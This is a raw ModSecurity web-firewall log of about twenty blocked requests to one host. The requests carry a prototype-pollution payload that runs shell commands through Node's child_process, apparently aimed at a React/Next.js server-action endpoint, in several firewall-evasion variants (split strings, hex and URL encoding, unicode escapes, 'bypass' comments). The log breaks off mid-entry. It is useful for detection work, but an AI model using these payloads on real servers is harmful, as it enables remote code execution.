"(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('chi' 'ld_' 'pro' 'cess').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/api"] [unique_id "adJmz7xQSOrq_iRTM7dqSAAAAQY"] [Sun Apr 05 15:42:39.283924 2026] [:error] [pid 13019:tid 13242] [client 172.94.9.253:45698] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:\\x5ct`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/post"] [unique_id "adJmz7xQSOrq_iRTM7dqSQAAAQI"] [Sun Apr 05 15:42:39.285021 2026] [:error] [pid 13019:tid 13245] [client 172.94.9.253:45680] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('6563686f2024282834312a3237312929','hex').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api"] [unique_id "adJmz7xQSOrq_iRTM7dqSgAAAQU"] [Sun Apr 05 15:42:39.285913 2026] [:error] [pid 13019:tid 13244] [client 172.94.9.253:45658] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api"] [unique_id "adJmz7xQSOrq_iRTM7dqSwAAAQQ"] [Sun Apr 05 15:42:39.286797 2026] [:error] [pid 13019:tid 13253] [client 172.94.9.253:45668] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('chi' 'ld_' 'pro' 'cess').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/de"] [unique_id "adJmz7xQSOrq_iRTM7dqTAAAAQ0"] [Sun Apr 05 15:42:39.287264 2026] [:error] [pid 13019:tid 13254] [client 172.94.9.253:45692] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:\\x5ct`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api"] [unique_id "adJmz7xQSOrq_iRTM7dqTQAAAQ4"] [Sun Apr 05 15:42:39.309123 2026] [:error] [pid 23077:tid 23105] [client 172.94.9.253:45714] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu0..."] [sever [hostname "cms.dev-unit.com"] [uri "/blog"] [unique_id "adJmz5c83uMXRUE9zvQTPQAAAdY"] [Sun Apr 05 15:42:39.315361 2026] [:error] [pid 13019:tid 13256] [client 172.94.9.253:45742] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require(['child','_','process'].join('')).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/api"] [unique_id "adJmz7xQSOrq_iRTM7dqTgAAARA"] [Sun Apr 05 15:42:39.315697 2026] [:error] [pid 23077:tid 23090] [client 172.94.9.253:45642] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api"] [unique_id "adJmz5c83uMXRUE9zvQTPAAAAcc"] [Sun Apr 05 15:42:39.316044 2026] [:error] [pid 13019:tid 13264] [client 172.94.9.253:45730] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('chi' 'ld_' 'pro' 'cess').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/account"] [unique_id "adJmz7xQSOrq_iRTM7dqTwAAARg"] [Sun Apr 05 15:42:39.341414 2026] [:error] [pid 13019:tid 13251] [client 172.94.9.253:45756] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(decodeURIComponent(decodeURIComponent('echo%20%24%28%2841%2A271%29%29'))).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/blog"] [unique_id "adJmz7xQSOrq_iRTM7dqUAAAAQs"] [Sun Apr 05 15:42:39.371504 2026] [:error] [pid 13019:tid 13254] [client 172.94.9.253:45800] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/blog"] [unique_id "adJmz7xQSOrq_iRTM7dqUQAAAQ4"] [Sun Apr 05 15:42:39.373074 2026] [:error] [pid 23077:tid 23086] [client 172.94.9.253:45816] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006c\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim(..."] [sever [hostname "cms.dev-unit.com"] [uri "/de"] [unique_id "adJmz5c83uMXRUE9zvQTPgAAAcM"] [Sun Apr 05 15:42:39.373430 2026] [:error] [pid 13019:tid 13243] [client 172.94.9.253:45846] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/blog"] [unique_id "adJmz7xQSOrq_iRTM7dqUgAAAQM"] [Sun Apr 05 15:42:39.373605 2026] [:error] [pid 23077:tid 23091] [client 172.94.9.253:45768] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22$K4\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:const..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth"] [unique_id "adJmz5c83uMXRUE9zvQTPwAAAcg"] [Sun Apr 05 15:42:39.380140 2026] [:error] [pid 23077:tid 23089] [client 172.94.9.253:45776] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/*bypass*/res=process.mainModule.require(/*waf*/'child_process'/*bypass*/).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_f..."] [sever [hostname "cms.dev-unit.com"] [uri "/api"] [unique_id "adJmz5c83uMXRUE9zvQTQAAAAcY"] [Sun Apr 05 15:42:39.382264 2026] [:error] [pid 13019:tid 13256] [client 172.94.9.253:45782] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('sh',['-c','echo $((41*271))']);var res=r.stdout.toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth"] [unique_id "adJmz7xQSOrq_iRTM7dqUwAAARA"] [Sun Apr 05 15:42:39.382770 2026] [:error] [pid 1503:tid 1510] [client 172.94.9.253:45802] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/*bypass*/res=process.mainModule.require(/*waf*/'child_process'/*bypass*/).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_f..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth"] [unique_id "adJmz0I7AjfUQYCN-J7DwwAAAME"] [Sun Apr 05 15:42:39.383217 2026] [:error] [pid 23077:tid 23094] [client 172.94.9.253:45792] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/blog"] [unique_id "adJmz5c83uMXRUE9zvQTQQAAAcs"] [Sun Apr 05 15:42:39.388433 2026] [:error] [pid 13019:tid 13258] [client 172.94.9.253:45832] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: 